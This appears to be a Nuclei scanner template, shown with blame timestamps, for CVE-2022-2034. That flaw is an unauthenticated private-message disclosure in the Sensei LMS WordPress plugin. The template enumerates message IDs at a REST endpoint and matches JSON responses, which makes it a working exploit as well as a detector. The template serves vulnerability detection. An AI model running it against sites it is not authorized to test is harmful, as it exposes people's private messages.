2022-08-30 15:59:02 +00:00
id : CVE-2022-2034
info :
name : Sensei LMS < 4.5.0 - Unauthenticated Private Messages Disclosure
author : imhunterand
severity : medium
description : |
The Sensei LMS WordPress plugin before 4.5.0 does not have proper permissions set in one of its REST endpoint, allowing unauthenticated users to access private messages sent to teachers
reference :
- https://wpscan.com/vulnerability/aba3dd58-7a8e-4129-add5-4dd5972c0426
2022-11-30 08:50:37 +00:00
- https://hackerone.com/reports/1590237
- https://wordpress.org/plugins/sensei-lms/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2022-2034
2022-08-30 15:59:02 +00:00
classification :
2022-12-01 11:45:00 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score : 5.3
2022-08-30 15:59:02 +00:00
cve-id : CVE-2022-2034
2022-12-01 11:45:00 +00:00
cwe-id : CWE-862
2022-11-30 08:55:47 +00:00
metadata :
2022-12-01 11:45:00 +00:00
verified : "true"
tags : wp,disclosure,wpscan,cve,cve2022,sensei-lms,fuzz,hackerone,wordpress,wp-plugin
2022-08-30 15:59:02 +00:00
requests :
- method : GET
path :
2022-12-01 07:07:53 +00:00
- "{{BaseURL}}/wp-json/wp/v2/sensei-messages/{{num}}"
2022-08-30 15:59:02 +00:00
2022-12-01 07:07:53 +00:00
payloads :
num : helpers/wordlists/numbers.txt
stop-at-first-match : true
2022-08-30 15:59:02 +00:00
matchers-condition : and
matchers :
2022-11-30 08:55:47 +00:00
- type : word
part : body
words :
2022-12-01 07:07:53 +00:00
- 'sensei_message'
2022-11-30 08:55:47 +00:00
- 'guid":{"rendered":'
2022-12-01 07:07:53 +00:00
condition : and
2022-11-30 08:55:47 +00:00
- type : word
2022-08-30 15:59:02 +00:00
part : header
2022-11-30 08:55:47 +00:00
words :
- application/json
2022-08-30 15:59:02 +00:00
- type : status
status :
2022-11-30 08:55:47 +00:00
- 200